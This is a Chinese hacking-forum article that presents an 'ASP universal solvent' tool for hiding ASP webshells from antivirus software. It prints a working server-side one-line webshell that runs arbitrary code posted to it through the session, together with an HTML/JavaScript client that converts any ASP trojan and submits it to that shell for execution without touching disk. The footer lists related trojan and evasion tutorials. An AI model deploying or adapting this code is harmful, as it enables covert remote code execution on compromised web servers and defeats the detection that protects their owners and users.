[推荐]asp马免杀工具----asp万能溶剂文章作者:虫虫
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
7天前俺询问netxfly合不合适把这个工具发出来,结果都不理俺~~~嘿嘿~~51节嘛, 大家都好忙哪~
asp万能溶剂----呵呵,忽然想出了一个这样的名字给我的小工具,感觉还够形象.
这是一个演示版本
先打个广告吧:
虫虫的asp万能溶剂----主要用于asp木马的免杀.目前为止可以使大部分的asp木马(不使用include的马)完全免受杀毒软件的追杀(不过LAKE的ASP木马查杀工具可以找到俺)~~
哈哈哈,好了不说了,发现我废话好多
其实很简单:思路就是将asp代码写入到session中保存,使用是只要execute(session("xx"))就可以,由于不用写文件,所以免除了被杀的危险,使用的时候感觉这个asp完全变成了要使用的木马~~所以想了个名字叫asp万能溶剂~其实俺还想叫他asp变形虫虫~~~
这样不追求将asp特征码修改而是完全不使用文件存储木马,可以说是另外一个免杀的思路吧.
代码分两部分,本地部分和服务器上的asp部分,跟一句话木马貌似,其实就是一句话的改进.
代码里有些注释,可以看看.
这是偶的代码:服务器上的asp部分
| 以下是引用片段: <%if request("aspcode_estcc_060430")<>"" then session("aspcode_estcc_060430")=request("aspcode_estcc_060430") end If execute(session("aspcode_estcc_060430"))%> |
| 以下是引用片段: <style type="text/css"> body,textarea,form,input,button { font-size:12px; border-width:1px; border-style:double; } </style> <script> function c1(ns) //处理非asp代码 { s=ns.replace(/"/igm,"\"\""); s= s.replace(/\r\n/igm,"\"+vbCrLf+\""); s="\nresponse.write \""+s+"\"\n"; //s= s.replace(/\+""[^"]|[^"]""\+/gm,"$1"); 本意是清除一些无用的语句,如 xx=""+vbcrlf+"",不过总有错误,放弃。 return s; } function c() //全部转换成asp代码,因为<%一类的字符会使execute出错, { var s=new String(document.all.text.value); var finished=new String(); s=s.replace(/<%=(.+?)%>/gm,"<%Response.write $1%>"); //先处理<%=xx%>这种情况 var aspCode=new RegExp("<%((.|\r|\n)*?)%>","igm"); while(aspCode.exec(s)!=null) { t=RegExp.$1; s=RegExp.rightContext; finished+=c1(RegExp.leftContext); finished+=t; aspCode.lastIndex=0; } if (s!=null){ finished += c1(s); } document.all.text.value=finished; } function check() { if(document.all.fpath.value==""){alert("溶剂在哪里啊溶剂在哪里?");} else{ document.all.form1.action=document.all.fpath.value; if (document.all.text.value==""){alert("把asp木马的内容全部复制过来丫~");} else{ c(); form1.submit(); } } } </script> <body> <center><span style="font-size:14px;color:red;">虫虫的ASP万能溶剂(变形虫虫?)</span> <form method=post action="" id=form1> <input type=hidden name=act_estcc_060430 ><!-- 加一些额外的操作例如在session中保存多个木马 还没写相关代码 --> <textarea id=text ROWS="30" COLS="80" name=aspcode_estcc_060430></textarea><br>把asp文件打开后整个复制过来就可以<br>include变通自己想办法吧 </form><br> 溶剂在这个地方: <input type=text id=fpath> <button onclick=’check()’>开始溶解!</button> |
| 2007年IE 0day 网马 | 04-02 | |
| 修改特征码打造免杀后门之灰鸽子 | 04-02 | |
| 挂马代码大全 | 03-22 | |
| 打造不死的asp木马 | 03-21 | |
| 木马免杀原理详解 | 01-31 | |
| 新编MS07004网页木马源码 | 01-27 | |
| 灰鸽子VIP2006服务端过各种杀毒软 | 01-26 | |
| 木马免杀之加壳与改入口点法 | 01-23 | |
| 灰鸽子超级详细教程(看了就会) | 01-16 | |
| 灰鸽子远程管理软件新手技术手册 | 12-27 | |
| 二个非常规ASP木马 | 12-13 | |
| 木马免杀浓缩精华版教程不看后悔 | 12-05 | |
您现在的位置: 